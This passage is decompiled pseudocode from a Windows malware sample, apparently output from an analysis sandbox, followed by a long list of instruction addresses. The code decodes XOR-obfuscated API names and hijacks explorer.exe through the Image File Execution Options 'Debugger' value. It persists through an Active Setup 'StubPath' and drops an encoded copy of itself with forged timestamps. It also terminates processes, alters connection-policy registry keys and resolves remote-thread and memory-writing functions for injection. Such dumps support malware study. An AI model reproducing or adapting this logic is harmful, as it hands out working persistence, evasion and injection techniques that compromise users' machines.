																		_t1301 =  &(_t1301[0]);
																		_t264 = _t1313 + 0x64; // 0x64
																		_t896 = _t1281 + _t264;
																	}
																	WriteFile(_t1317[0xb0], _t1281, _t1313 + 0x64,  &(_t1317[0xa0]), 0); // executed
																	E00401029(_t1281);
																	__eflags = _t1317[0xc];
																	if(_t1317[0xc] != 0) {
																		SetFileTime(_t1317[0xac],  &(_t1317[0x84]),  &(_t1317[0x88]),  &(_t1317[0x8c])); // executed
																	}
																	CloseHandle(_t1317[0xa0]); // executed
																	_t1200 =  &(_t1317[0xf40]);
																	CreateFileA(_t1200, 0x80000000, 1, 0, 3, 0, "true"); // executed
																	E00401251(_t1317[0x98]);
																	_t1317[0x9c] = 1;
																	_t906 = RegSetValueExA(_t1317[0xac], "IsInstalled", 0, 4,  &(_t1317[0xa0]), 4); // executed
																	_push(_t1200);
																	L00405E40();
																	_t907 = _t906 + 1;
																	__eflags = _t907;
																	RegSetValueExA(_t1317[0xac], "StubPath", 0, 1, _t1200, _t907); // executed
																	_t1317[0x28] = 1;
																	goto L530;
																}
																__eflags =  *((char*)(_t1316 + 0x1e8));
																if( *((char*)(_t1316 + 0x1e8)) != 0) {
																	_push(_t1170);
																	_t920 = _t1316 + 0x1bc;
																	_push(_t920);
																	L00405E20();
																	while(1) {
																		_t1201 = _t1316 + 0x1b8;
																		_push(_t1201);
																		L00405E40();
																		__eflags = _t920 - 0xf;
																		if(_t920 > 0xf) {
																			goto L500;
																		}
																		_t920 = _t1316 + 0x1e8;
																		_push(_t920);
																		_push(_t1201);
																		L00405E30();
																	}
																	goto L500;
																}
																goto L496;
															}
															_t922 = RegCreateKeyA(0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\explorer.exe", _t1316 + 0x98); // executed
															__eflags = _t922;
															if(_t922 != 0) {
																goto L494;
															}
															_t1202 = _t1316 + 0x123c;
															_t923 = GetSystemDirectoryA(_t1202, 0x104);
															_push( *0x4120a0);
															_push(0x41103e);
															_push(_t1202);
															L00405E30();
															_push(_t923);
															L00405E30();
															_t924 = "{1A59D3E9-9D17-EB65-EA3F-071C953972C0}";
															while(1) {
																__eflags = _t924 - 0x407b06;
																if(_t924 >= 0x407b06) {
																	break;
																}
																 *_t924 =  *_t924 ^ 0x000000d4;
																_t924 =  &(_t924[1]);
															}
															_t925 = CreateMutexA(0, 0, "{1A59D3E9-9D17-EB65-EA3F-071C953972C0}"); // executed
															 *(_t1316 + 0xa0) = _t925;
															__eflags = _t925;
															if(_t925 == 0) {
																Sleep(0x7d0);
															} else {
																WaitForSingleObject(_t925, 0x2710);
																CloseHandle( *(_t1316 + 0xa0)); // executed
															}
															_t1203 = _t1316 + 0x123c;
															SetFileAttributesA(_t1203, 0x80); // executed
															_t927 = CreateFileA(_t1203, 0x40000000, 0, 0, 2, 0x80, 0); // executed
															 *(_t1316 + 0xa0) = _t927;
															__eflags = _t927;
															if(_t927 == 0) {
																L493:
																RegCloseKey( *(_t1316 + 0x98)); // executed
																goto L494;
															}
															__eflags = _t927 - 0xffffffff;
															if(_t927 == 0xffffffff) {
																goto L493;
															}
															WriteFile(_t927, 0x407b20, 0xc00, _t1316 + 0xa0, 0); // executed
															_t930 = E004010B2();
															 *(_t1316 + 0x1b) = _t930;
															__eflags = _t930;
															if(_t930 == 0) {
																 *(_t1316 + 0x1b) = 0x66;
															}
															_t932 = E00401000(_t1313 + 0x64);
															 *((char*)(_t932 + _t1313)) = 0;
															_t1282 = _t932;
															_t1302 = _t932;
															_t1271 =  *(_t1316 + 0x14);
															_t933 = _t932 + _t1313;
															while(1) {
																__eflags = _t1302 - _t933;
																if(_t1302 >= _t933) {
																	break;
																}
																_t957 =  *(_t1316 + 0x1b) & 0x000000ff ^  *_t1271;
																_t1271 =  &(_t1271[0]);
																 *_t1302 = _t957;
																_t1302 = _t1302 + 1;
																_t933 = _t1282 + _t1313;
															}
															_t934 = _t1316 + 0x1568;
															_t1204 = _t1282 + _t1313;
															_push(_t934);
															L00405E40();
															_t1303 = _t1204 + _t934 + 5;
															__eflags = _t1303 - _t1204 + 0x64;
															while(__eflags < 0) {
																 *_t1303 = E004010B2();
																_t1303 = _t1303 + 1;
																_t183 = _t1313 + 0x64; // 0x64
																__eflags = _t1303 - _t1282 + _t183;
															}
															 *(_t1282 + _t1313 + 1) = _t1313;
															_t1206 = _t1282 + _t1313;
															_push(_t1316 + 0x1568);
															_t1304 = _t1206;
															_push( &(_t1206[1]));
															L00405E20();
															_t937 =  &(_t1206[0x19]);
															while(1) {
																__eflags = _t1304 - _t937;
																if(_t1304 >= _t937) {
																	break;
																}
																 *_t1304 =  *_t1304 ^  *(_t1316 + 0x1b) & 0x000000ff;
																_t1304 =  &(_t1304[0]);
																_t192 = _t1313 + 0x64; // 0x64
																_t937 = _t1282 + _t192;
															}
															WriteFile( *(_t1316 + 0xb0), _t1282, _t1313 + 0x64, _t1316 + 0xa0, 0); // executed
															E00401029(_t1282);
															__eflags =  *(_t1316 + 0xc);
															if( *(_t1316 + 0xc) != 0) {
																SetFileTime( *(_t1316 + 0xac), _t1316 + 0x84, _t1316 + 0x88, _t1316 + 0x8c); // executed
															}
															CloseHandle( *(_t1316 + 0xa0));
															_t1207 = _t1316 + 0x1250;
															CreateFileA(_t1207, 0x80000000, 1, 0, 3, 0, 0); // executed
															RegDeleteValueA( *(_t1316 + 0x9c), "Debugger"); // executed
															_t946 = E00401251( *(_t1316 + 0x98));
															_push(_t1207);
															L00405E40();
															_t947 = _t946 + 1;
															__eflags = _t947;
															RegSetValueExA( *(_t1316 + 0xac), "Debugger", 0, 1, _t1207, _t947); // executed
															 *(_t1316 + 0x2c) = 1;
															goto L493;
														}
														__eflags = _t606 - 0xffffffff;
														if(_t606 == 0xffffffff) {
															goto L461;
														}
														_t1313 = GetFileSize(_t606, 0);
														 *(_t1316 + 0x14) = E00401000(_t960);
														ReadFile( *(_t1316 + 0xb0),  *(_t1316 + 0x20), _t1313, _t1316 + 0xa0, 0); // executed
														CloseHandle( *(_t1316 + 0xa0));
														goto L462;
													}
													_t1208 = _t1316 + 0x145c;
													_t965 = GetSystemDirectoryA(_t1208, 0x100);
													_push( *0x4120b0);
													_push(0x41103e);
													_push(_t1208);
													L00405E30();
													L00405E30();
													_t1305 = _t1316 + 0x1568;
													_t967 = E004010F7(_t1316 + 0x1568, _t1208, _t965);
													__eflags = _t967;
													if(_t967 != 0) {
														L446:
														__eflags =  *(_t1316 + 0x20);
														if( *(_t1316 + 0x20) != 0) {
															_t980 = CreateFileA(_t1316 + 0x1470, 0x40000000, 0, 0, 3, 0, 0);
															__eflags = _t980;
															_t1211 = _t980;
															if(_t980 != 0) {
																__eflags = _t980 - 0xffffffff;
																if(_t980 != 0xffffffff) {
																	SetFilePointer(_t980, 0xfffffff0, 0, 2);
																	WriteFile(_t1211, 0x4120e0, 4, _t1316 + 0xa0, 0);
																	CloseHandle(_t1211);
																}
															}
														}
														__eflags =  *(_t1316 + 0xc);
														if( *(_t1316 + 0xc) != 0) {
															_t973 = CreateFileA(_t1316 + 0x1470, 0x80000100, 1, 0, 3, 0, 0);
															__eflags = _t973;
															_t1210 = _t973;
															if(_t973 != 0) {
																__eflags = _t973 - 0xffffffff;
																if(_t973 != 0xffffffff) {
																	SetFileTime(_t1210, _t1316 + 0x84, _t1316 + 0x88, _t1316 + 0x8c);
																	CloseHandle(_t1210);
																}
															}
														}
														_t1306 = _t1316 + 0x145c;
														SetFileAttributesA(_t1306, 0x21);
														CloseHandle( *(_t1316 + 0x10));
														_t1209 = _t1316 + 0xb28;
														GetStartupInfoA(_t1209);
														CreateProcessA(_t1306, 0, 0, 0, 0, 0, 0, 0, _t1209, _t1316 + 0xb18);
														L455:
														L456:
														ExitProcess(0);
														L457:
														 *0x412000 = 1;
														goto L458;
													}
													_push(0x104);
													_push(_t1208);
													_push( *0x4120b0);
													_push("%CommonProgramFiles%\\System\\");
													_t1283 = _t1316 + 0x1358;
													L00405E20();
													L00405E30();
													_t985 = ExpandEnvironmentStringsA(_t967, _t967, _t1283);
													__eflags = _t985;
													if(_t985 == 0) {
														L444:
														_push(0x104);
														_push(_t1208);
														_push( *0x4120b0);
														_push("%AppData%\\");
														L00405E20();
														L00405E30();
														_t986 = ExpandEnvironmentStringsA(_t985, _t985, _t1283);
														__eflags = _t986;
														if(_t986 == 0) {
															goto L457;
														}
														_t988 = E004010F7(_t1305, _t1208);
														__eflags = _t988;
														if(_t988 == 0) {
															goto L457;
														}
														goto L446;
													}
													_t985 = E004010F7(_t1305, _t1208);
													__eflags = _t985;
													if(_t985 != 0) {
														goto L446;
													}
													goto L444;
												}
												L435:
												CloseHandle( *(_t1316 + 0x10)); // executed
												goto L436;
											}
											__eflags =  *(_t1316 + 0x34) - 0x11;
											if( *(_t1316 + 0x34) > 0x11) {
												__eflags =  *(_t1316 + 0x1c);
												if( *(_t1316 + 0x1c) != 0) {
													goto L456;
												}
												E0040265F(0);
												goto L435;
											}
											_t997 = CreateToolhelp32Snapshot(2, 0);
											__eflags = _t997;
											_t1315 = _t997;
											if(_t997 == 0) {
												L424:
												__eflags =  *(_t1316 + 0x34) - 0xb;
												if( *(_t1316 + 0x34) > 0xb) {
													goto L435;
												}
												_t999 = RegOpenKeyExA(0x80000001, "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connection Policy", 0, 0x20019, _t1316 + 0x98);
												__eflags = _t999;
												if(_t999 != 0) {
													goto L435;
												}
												 *(_t1316 + 0x30) = 0;
												_t1001 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connection Policy", 0, 0, 0, 0xf003f, 0x408778, _t1316 + 0x98, 0);
												__eflags = _t1001;
												if(_t1001 != 0) {
													L431:
													RegCloseKey( *(_t1316 + 0x98));
													goto L435;
												}
												 *(_t1316 + 0x9c) = 0x12;
												_t1004 = RegQueryValueExA( *(_t1316 + 0xac), "Default Flags", 0, 0, 0x412190, _t1316 + 0x9c);
												__eflags = _t1004;
												if(_t1004 == 0) {
													_t1007 = RegSetValueExA( *(_t1316 + 0xa8), "Default Flags", 0, 3, 0x412190, 0x12);
													__eflags = _t1007;
													_t118 = _t1007 == 0;
													__eflags = _t118;
													 *(_t1316 + 0x30) = (_t1007 & 0xffffff00 | _t118) & 0x000000ff;
												}
												RegCloseKey( *(_t1316 + 0x94));
												__eflags =  *(_t1316 + 0x30);
												if( *(_t1316 + 0x30) == 0) {
													RegDeleteKeyA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connection Policy");
												}
												goto L431;
											}
											_t1011 = E004030DE(_t1316 + 0x1f8);
											 *(_t1316 + 4) = _t1011;
											__eflags = _t1011;
											if(_t1011 == 0) {
												L403:
												_t1012 = GetCurrentProcessId();
												 *(_t1316 + 0x428) = 0x128;
												_t1212 = _t1012;
												_t1284 = 0;
												__eflags = 0;
												_t1014 = Process32First(_t1315, _t1316 + 0x428);
												while(1) {
													__eflags = _t1014;
													if(_t1014 == 0) {
														break;
													}
													__eflags =  *(_t1316 + 0x430) - _t1212;
													if( *(_t1316 + 0x430) == _t1212) {
														L410:
														_t1014 = Process32Next(_t1315, _t1316 + 0x428);
														continue;
													}
													_push( *0x4120b0);
													_t1024 = E004010DC(_t1316 + 0x450);
													_push(_t1024);
													_t1308 = _t1024;
													L00405E50();
													__eflags = _t1024;
													if(_t1024 == 0) {
														L408:
														_t1025 = OpenProcess(0x100201, 0,  *(_t1316 + 0x430));
														 *(_t1316 + 0x558 + _t1284 * 4) = _t1025;
														__eflags = _t1025;
														if(_t1025 == 0) {
															goto L410;
														}
														_t1284 = _t1284 + 1;
														__eflags = _t1284 - 9;
														if(_t1284 > 9) {
															break;
														}
														goto L410;
													}
													_push("winrnt.exe");
													_push(_t1308);
													L00405E50();
													__eflags = _t1024;
													if(_t1024 != 0) {
														goto L410;
													}
													goto L408;
												}
												_t1213 = 0;
												__eflags = 0;
												CloseHandle(_t1315);
												while(1) {
													__eflags = _t1213 - _t1284;
													if(_t1213 >= _t1284) {
														break;
													}
													_t1213 = _t1213 + 1;
													SetPriorityClass( *(_t1316 + 0x55c + _t1213 * 4), 0x40);
												}
												_t1307 = 4;
												do {
													_t1214 = 0;
													__eflags = 0;
													while(1) {
														__eflags = _t1214 - _t1284;
														if(_t1214 >= _t1284) {
															goto L418;
														}
														_t1214 = _t1214 + 1;
														TerminateProcess( *(_t1316 + 0x55c + _t1214 * 4), 0);
													}
													L418:
													_t1307 = _t1307 - 1;
													__eflags = _t1307;
												} while (_t1307 >= 0);
												_t1215 = 0;
												__eflags = 0;
												while(1) {
													__eflags = _t1215 - _t1284;
													if(_t1215 >= _t1284) {
														break;
													}
													WaitForSingleObject( *(_t1316 + 0x55c + _t1215 * 4), 0x1388);
													_t1215 = _t1215 + 1;
													CloseHandle( *(_t1316 + 0x558 + _t1215 * 4));
												}
												__eflags =  *(_t1316 + 4);
												if( *(_t1316 + 4) != 0) {
													_t1216 = _t1316 + 0x21e;
													SetFileAttributesA(_t1216, 0x80);
													DeleteFileA(_t1216);
												}
												goto L424;
											}
											RegDeleteValueA(_t1011, "SubshellState");
											RegCloseKey( *(_t1316 + 4));
											_t1309 = _t1316 + 0x21a;
											_t1277 = _t1316 + 0x31e;
											while(1) {
												__eflags = _t1309 - _t1277;
												if(_t1309 >= _t1277) {
													goto L403;
												}
												 *_t1309 =  *_t1309 ^  *(_t1316 + 0x1f8) & 0x000000ff;
												_t1309 =  &(_t1309[0]);
											}
											goto L403;
											L436:
											 *(_t1316 + 0x34) =  *(_t1316 + 0x34) + 1;
										}
									}
									_t1093 = "InternetOpenA";
									while(1) {
										__eflags = _t1093 - 0x4105fd;
										if(_t1093 >= 0x4105fd) {
											break;
										}
										 *_t1093 =  *_t1093 ^ 0x000000d4;
										_t1093 =  &(_t1093[1]);
									}
									_t1094 = "InternetOpenUrlA";
									while(1) {
										__eflags = _t1094 - 0x4105ef;
										if(_t1094 >= 0x4105ef) {
											break;
										}
										 *_t1094 =  *_t1094 ^ 0x000000d4;
										_t1094 =  &(_t1094[1]);
									}
									_t1095 = "InternetReadFile";
									while(1) {
										__eflags = _t1095 - 0x4105de;
										if(_t1095 >= 0x4105de) {
											break;
										}
										 *_t1095 =  *_t1095 ^ 0x000000d4;
										_t1095 =  &(_t1095[1]);
									}
									_t1096 = "InternetSetOptionA";
									while(1) {
										__eflags = _t1096 - 0x4105cd;
										if(_t1096 >= 0x4105cd) {
											break;
										}
										 *_t1096 =  *_t1096 ^ 0x000000d4;
										_t1096 =  &(_t1096[1]);
									}
									_t1097 = "InternetCloseHandle";
									while(1) {
										__eflags = _t1097 - 0x4105ba;
										if(_t1097 >= 0x4105ba) {
											break;
										}
										 *_t1097 =  *_t1097 ^ 0x000000d4;
										_t1097 =  &(_t1097[1]);
									}
									 *0x4121d0 = GetProcAddress(_t1168, "InternetOpenA");
									 *0x4121e0 = GetProcAddress(_t1168, "InternetOpenUrlA");
									 *0x4121f0 = GetProcAddress(_t1168, "InternetReadFile");
									 *0x412200 = GetProcAddress(_t1168, "InternetSetOptionA");
									 *0x412210 = GetProcAddress(_t1168, "InternetCloseHandle");
									goto L136;
								}
								_t1108 = "GetIpAddrTable";
								while(1) {
									__eflags = _t1108 - 0x4106f4;
									if(_t1108 >= 0x4106f4) {
										break;
									}
									 *_t1108 =  *_t1108 ^ 0x000000d4;
									_t1108 =  &(_t1108[1]);
								}
								 *0x4121c0 = GetProcAddress(_t1167, "GetIpAddrTable");
								goto L95;
							}
							_t1110 = "RasEnumConnectionsA";
							while(1) {
								__eflags = _t1110 - 0x410715;
								if(_t1110 >= 0x410715) {
									break;
								}
								 *_t1110 =  *_t1110 ^ 0x000000d4;
								_t1110 =  &(_t1110[1]);
							}
							 *0x4121b0 = GetProcAddress(_t1166, "RasEnumConnectionsA");
							goto L86;
						}
						_t1113 = "CreateRemoteThread";
						while(1) {
							__eflags = _t1113 - 0x4107ce;
							if(_t1113 >= 0x4107ce) {
								break;
							}
							 *_t1113 =  *_t1113 ^ 0x000000d4;
							_t1113 =  &(_t1113[1]);
						}
						 *0x412260 = GetProcAddress(_t1162, "CreateRemoteThread");
						_t1115 = "ntdll.dll";
						while(1) {
							__eflags = _t1115 - 0x4107bb;
							if(_t1115 >= 0x4107bb) {
								break;
							}
							 *_t1115 =  *_t1115 ^ 0x000000d4;
							_t1115 =  &(_t1115[1]);
						}
						_t1116 = "NtAllocateVirtualMemory";
						while(1) {
							__eflags = _t1116 - 0x4107b1;
							if(_t1116 >= 0x4107b1) {
								break;
							}
							 *_t1116 =  *_t1116 ^ 0x000000d4;
							_t1116 =  &(_t1116[1]);
						}
						_t1117 = "NtWriteVirtualMemory";
						while(1) {
							__eflags = _t1117 - 0x410799;
							if(_t1117 >= 0x410799) {
								break;
							}
							 *_t1117 =  *_t1117 ^ 0x000000d4;
							_t1117 =  &(_t1117[1]);
						}
						_t1118 = "NtShutdownSystem";
						while(1) {
							__eflags = _t1118 - 0x410784;
							if(_t1118 >= 0x410784) {
								break;
							}
							 *_t1118 =  *_t1118 ^ 0x000000d4;
							_t1118 =  &(_t1118[1]);
						}
						_t1119 = "RtlAdjustPrivilege";
						while(1) {
							__eflags = _t1119 - 0x410773;
							if(_t1119 >= 0x410773) {
								break;
							}
							 *_t1119 =  *_t1119 ^ 0x000000d4;
							_t1119 =  &(_t1119[1]);
						}
						_t1120 = LoadLibraryA("ntdll.dll");
						_t1217 = _t1120;
						 *0x412220 = GetProcAddress(_t1120, "NtAllocateVirtualMemory");
						 *0x412230 = GetProcAddress(_t1217, "NtWriteVirtualMemory");
						 *0x412240 = GetProcAddress(_t1217, "NtShutdownSystem");
						_t1124 = GetProcAddress(_t1217, "RtlAdjustPrivilege");
						 *0x412250 = _t1124;
						__eflags = _t1124;
						_t1232 = _t1124;
						if(_t1124 != 0) {
							RtlAdjustPrivilege(0x14, 1, 0, _t1316 + 0xa7); // executed
						}
						_t1125 = "NtOpenProcessToken";
						while(1) {
							__eflags = _t1125 - 0x410760;
							if(_t1125 >= 0x410760) {
								break;
							}
							 *_t1125 =  *_t1125 ^ 0x000000d4;
							_t1125 =  &(_t1125[1]);
						}
						_t1126 = "NtQueryInformationToken";
						while(1) {
							__eflags = _t1126 - 0x41074d;
							if(_t1126 >= 0x41074d) {
								break;
							}
							 *_t1126 =  *_t1126 ^ 0x000000d4;
							_t1126 =  &(_t1126[1]);
						}
						_t1127 = GetProcAddress(_t1217, "NtOpenProcessToken");
						__eflags = _t1127;
						_t1310 = _t1127;
						if(_t1127 == 0) {
							goto L77;
						}
						_t1128 = GetProcAddress(_t1217, "NtQueryInformationToken");
						__eflags = _t1128;
						_t1285 = _t1128;
						if(_t1128 == 0) {
							goto L77;
						}
						_t1130 =  *_t1310(0xffffffff, 8, _t1316 + 0xa0);
						__eflags = _t1130;
						if(_t1130 < 0) {
							goto L77;
						}
						_t1311 = _t1316 + 0x9c;
						_t1132 = E00401000(0x2000);
						_t1218 = _t1132;
						_t1133 =  *_t1285( *(_t1316 + 0xb0), 2, _t1132, 0x2000, _t1311); // executed
						__eflags = _t1133;
						if(_t1133 < 0) {
							L69:
							E00401029(_t1218);
							CloseHandle( *(_t1316 + 0xa0)); // executed
							goto L77;
						}
						 *(_t1316 + 0x34) = 0;
						_t1221 =  *_t1218;
						while(1) {
							__eflags =  *(_t1316 + 0x34) - _t1221;
							if( *(_t1316 + 0x34) >= _t1221) {
								goto L69;
							}
							_t1232 =  *(_t1316 + 0x34);
							_t1137 = _t1218[8 + _t1232 * 8];
							__eflags = _t1137 & 0x00000004;
							if((_t1137 & 0x00000004) == 0) {
								L68:
								 *(_t1316 + 0x34) =  *(_t1316 + 0x34) + 1;
								continue;
							}
							__eflags = _t1137 & 0x00000010;
							if((_t1137 & 0x00000010) != 0) {
								goto L68;
							}
							_t1232 = _t1218[4 + _t1232 * 8];
							_t1139 =  *((intOrPtr*)(_t1232 + 4 + ( *(_t1232 + 1) & 0x000000ff) * 4));
							__eflags = _t1139 - 0x220;
							if(__eflags == 0) {
								L63:
								 *(_t1316 + 0xb) = 0;
								 *0x412020 = 1; // executed
								_t1140 =  *_t1285( *(_t1316 + 0xb0), 1, _t1218, 0x2000, _t1311); // executed
								__eflags = _t1140;
								if(_t1140 >= 0) {
									_t1141 =  *_t1218;
									__eflags =  *((char*)(_t1141 + 1)) - 1;
									if( *((char*)(_t1141 + 1)) == 1) {
										__eflags =  *((intOrPtr*)(_t1141 + 8)) - 0x12;
										if( *((intOrPtr*)(_t1141 + 8)) == 0x12) {
											 *(_t1316 + 0xb) = 1;
										}
									}
								}
								_t1232 =  *(_t1316 + 0xb) & 0x000000ff;
								 *0x412010 = _t1232;
								goto L69;
							}
							if(__eflags > 0) {
								__eflags = _t1139 - 0x223;
							} else {
								__eflags = _t1139 - 0x200;
							}
							if(__eflags != 0) {
								goto L68;
							} else {
								goto L63;
							}
						}
						goto L69;
					}
					_t1144 = CreateToolhelp32Snapshot(2, 0);
					 *(_t1316 + 0xa0) = _t1144;
					__eflags = _t1144;
					if(_t1144 == 0) {
						goto L456;
					}
					 *(_t1316 + 0x9c) = GetCurrentProcessId();
					_t1219 = 0;
					__eflags = 0;
					 *(_t1316 + 0x9e8) = 0x128;
					_t1147 = Process32First( *(_t1316 + 0xa4), _t1316 + 0x9e8);
					while(1) {
						__eflags = _t1147;
						if(_t1147 == 0) {
							break;
						}
						__eflags =  *((intOrPtr*)(_t1316 + 0x9f0)) -  *(_t1316 + 0x9c);
						if( *((intOrPtr*)(_t1316 + 0x9f0)) ==  *(_t1316 + 0x9c)) {
							_t1219 = OpenProcess(0x100000, 0,  *(_t1316 + 0xa00));
							break;
						}
						_t1147 = Process32Next( *(_t1316 + 0xa4), _t1316 + 0x9e8);
					}
					CloseHandle( *(_t1316 + 0xa0));
					__eflags = _t1219;
					if(_t1219 == 0) {
						goto L456;
					}
					WaitForSingleObject(_t1219, 0xffffffff);
					CloseHandle(_t1219);
					_t1220 = _t1316 + 0xb28;
					GetStartupInfoA(_t1220);
					CreateProcessA(_t1316 + 0x158c, 0, 0, 0, 0, 0, 0, 0, _t1220, _t1316 + 0xb18);
					goto L455;
				}
				_t1156 = 0x4107cf;
				while(1) {
					__eflags = _t1156 - 0x4107e5;
					if(_t1156 >= 0x4107e5) {
						break;
					}
					 *_t1156 =  *_t1156 ^ 0x000000d4;
					_t1156 =  &(_t1156[1]);
				}
				_t1157 = GetProcAddress(_t1162, 0x4107cf);
				__eflags = _t1157;
				if(_t1157 != 0) {
					 *_t1157(0, 1);
				}
				goto L14;
			}

0x004033f4
0x004033f9
0x00403401
0x00403409
0x00403411
0x00403419
0x0040342b
0x00403430
0x0040343a
0x0040343f
0x00403444
0x0040344b
0x0040344e
0x0040344e
0x00403451
0x00403456
0x00403456
0x0040345b
0x00000000
0x00000000
0x0040345d
0x0040345d
0x00403460
0x00403460
0x00403468
0x0040346d
0x00403474
0x00403476
0x0040349f
0x004034ae
0x004034b3
0x004034b8
0x004034bd
0x004034c2
0x004034c4
0x004035a3
0x004035aa
0x004035af
0x004037c7
0x004037c7
0x004037cc
0x00000000
0x00000000
0x004037ce
0x004037ce
0x004037d1
0x004037d1
0x004037df
0x004037e1
0x004037e1
0x004037e7
0x00000000
0x00000000
0x004037e9
0x004037e9
0x004037ec
0x004037f2
0x004037fd
0x00403807
0x00403807
0x0040380d
0x00403814
0x00403815
0x00403817
0x0040381c
0x00403823
0x00403832
0x00403832
0x00403834
0x00403839
0x0040383f
0x0040383f
0x00403844
0x00000000
0x00000000
0x00403846
0x00403849
0x00403849
0x00403851
0x00403856
0x00403858
0x0040385a
0x00403880
0x0040388a
0x0040388a
0x0040388f
0x0040388f
0x00403894
0x00000000
0x00000000
0x00403896
0x00403899
0x00403899
0x004038a1
0x004038a6
0x004038a8
0x004038aa
0x004038d0
0x004038da
0x004038da
0x004038df
0x004038df
0x004038e4
0x00000000
0x00000000
0x004038e6
0x004038e9
0x004038e9
0x004038ec
0x004038f1
0x004038f1
0x004038f6
0x00000000
0x00000000
0x004038f8
0x004038f8
0x004038fb
0x004038fb
0x004038fe
0x00403903
0x00403903
0x00403908
0x00000000
0x00000000
0x0040390a
0x0040390a
0x0040390d
0x0040390d
0x00403910
0x00403915
0x00403915
0x0040391a
0x00000000
0x00000000
0x0040391c
0x0040391c
0x0040391f
0x0040391f
0x00403922
0x00403927
0x00403927
0x0040392c
0x00000000
0x00000000
0x0040392e
0x0040392e
0x00403931
0x00403931
0x00403934
0x00403939
0x00403939
0x0040393e
0x00000000
0x00000000
0x00403940
0x00403940
0x00403943
0x00403943
0x0040394b
0x00403950
0x00403952
0x00403954
0x00403a06
0x00403a10
0x00403a10
0x00403a15
0x00403a15
0x00403a1a
0x00000000
0x00000000
0x00403a1c
0x00403a1f
0x00403a1f
0x00403a22
0x00403a27
0x00403a27
0x00403a2c
0x00000000
0x00000000
0x00403a2e
0x00403a2e
0x00403a31
0x00403a31
0x00403a34
0x00403a39
0x00403a39
0x00403a3e
0x00000000
0x00000000
0x00403a40
0x00403a40
0x00403a43
0x00403a43
0x00403a46
0x00403a4b
0x00403a4b
0x00403a50
0x00000000
0x00000000
0x00403a52
0x00403a52
0x00403a55
0x00403a55
0x00403a58
0x00403a5d
0x00403a5d
0x00403a62
0x00000000
0x00000000
0x00403a64
0x00403a64
0x00403a67
0x00403a67
0x00403a6a
0x00403a6f
0x00403a6f
0x00403a74
0x00000000
0x00000000
0x00403a76
0x00403a76
0x00403a79
0x00403a79
0x00403a7c
0x00403a81
0x00403a81
0x00403a86
0x00000000
0x00000000
0x00403a88
0x00403a88
0x00403a8b
0x00403a8b
0x00403a8e
0x00403a93
0x00403a93
0x00403a98
0x00000000
0x00000000
0x00403a9a
0x00403a9a
0x00403a9d
0x00403a9d
0x00403aa0
0x00403aa5
0x00403aa5
0x00403aaa
0x00000000
0x00000000
0x00403aac
0x00403aac
0x00403aaf
0x00403aaf
0x00403ab2
0x00403ab7
0x00403ab7
0x00403abc
0x00000000
0x00000000
0x00403abe
0x00403abe
0x00403ac1
0x00403ac1
0x00403ac4
0x00403ac9
0x00403ac9
0x00403ace
0x00000000
0x00000000
0x00403ad0
0x00403ad0
0x00403ad3
0x00403ad3
0x00403ad6
0x00403adb
0x00403adb
0x00403ae0
0x00000000
0x00000000
0x00403ae2
0x00403ae2
0x00403ae5
0x00403ae5
0x00403ae8
0x00403aed
0x00403aed
0x00403af2
0x00000000
0x00000000
0x00403af4
0x00403af4
0x00403af7
0x00403af7
0x00403afa
0x00403aff
0x00403aff
0x00403b04
0x00000000
0x00000000
0x00403b06
0x00403b06
0x00403b09
0x00403b09
0x00403b0c
0x00403b11
0x00403b11
0x00403b16
0x00000000
0x00000000
0x00403b18
0x00403b18
0x00403b1b
0x00403b1b
0x00403b1e
0x00403b23
0x00403b23
0x00403b28
0x00000000
0x00000000
0x00403b2a
0x00403b2a
0x00403b2d
0x00403b2d
0x00403b30
0x00403b35
0x00403b35
0x00403b3a
0x00000000
0x00000000
0x00403b3c
0x00403b3c
0x00403b3f
0x00403b3f
0x00403b42
0x00403b47
0x00403b47
0x00403b4c
0x00000000
0x00000000
0x00403b4e
0x00403b4e
0x00403b51
0x00403b51
0x00403b54
0x00403b59
0x00403b59
0x00403b5e
0x00000000
0x00000000
0x00403b60
0x00403b60
0x00403b63
0x00403b63
0x00403b66
0x00403b6b
0x00403b6b
0x00403b70
0x00000000
0x00000000
0x00403b72
0x00403b72
0x00403b75
0x00403b75
0x00403b78
0x00403b7d
0x00403b7d
0x00403b82
0x00000000
0x00000000
0x00403b84
0x00403b84
0x00403b87
0x00403b87
0x00403b8a
0x00403b8f
0x00403b8f
0x00403b94
0x00000000
0x00000000
0x00403b96
0x00403b96
0x00403b99
0x00403b99
0x00403b9c
0x00403ba1
0x00403ba1
0x00403ba6
0x00000000
0x00000000
0x00403ba8
0x00403ba8
0x00403bab
0x00403bab
0x00403bae
0x00403bb3
0x00403bb3
0x00403bb8
0x00000000
0x00000000
0x00403bba
0x00403bba
0x00403bbd
0x00403bbd
0x00403bc0
0x00403bc5
0x00403bc5
0x00403bca
0x00000000
0x00000000
0x00403bcc
0x00403bcc
0x00403bcf
0x00403bcf
0x00403bd2
0x00403bd7
0x00403bd7
0x00403bdc
0x00000000
0x00000000
0x00403bde
0x00403bde
0x00403be1
0x00403be1
0x00403be4
0x00403be9
0x00403be9
0x00403bee
0x00000000
0x00000000
0x00403bf0
0x00403bf0
0x00403bf3
0x00403bf3
0x00403bf6
0x00403bfb
0x00403bfb
0x00403c00
0x00000000
0x00000000
0x00403c02
0x00403c02
0x00403c05
0x00403c05
0x00403c08
0x00403c0d
0x00403c0d
0x00403c12
0x00000000
0x00000000
0x00403c14
0x00403c14
0x00403c17
0x00403c17
0x00403c1a
0x00403c1f
0x00403c1f
0x00403c24
0x00000000
0x00000000
0x00403c26
0x00403c26
0x00403c29
0x00403c29
0x00403c2c
0x00403c31
0x00403c31
0x00403c36
0x00000000
0x00000000
0x00403c38
0x00403c38
0x00403c3b
0x00403c3b
0x00403c3e
0x00403c43
0x00403c43
0x00403c48
0x00000000
0x00000000
0x00403c4a
0x00403c4a
0x00403c4d
0x00403c4d
0x00403c50
0x00403c55
0x00403c55
0x00403c5a
0x00000000
0x00000000
0x00403c5c
0x00403c5c
0x00403c5f
0x00403c5f
0x00403c62
0x00403c67
0x00403c67
0x00403c6c
0x00000000
0x00000000
0x00403c6e
0x00403c6e
0x00403c71
0x00403c71
0x00403c74
0x00403c79
0x00403c79
0x00403c7e
0x00000000
0x00000000
0x00403c80
0x00403c80
0x00403c83
0x00403c83
0x00403c86
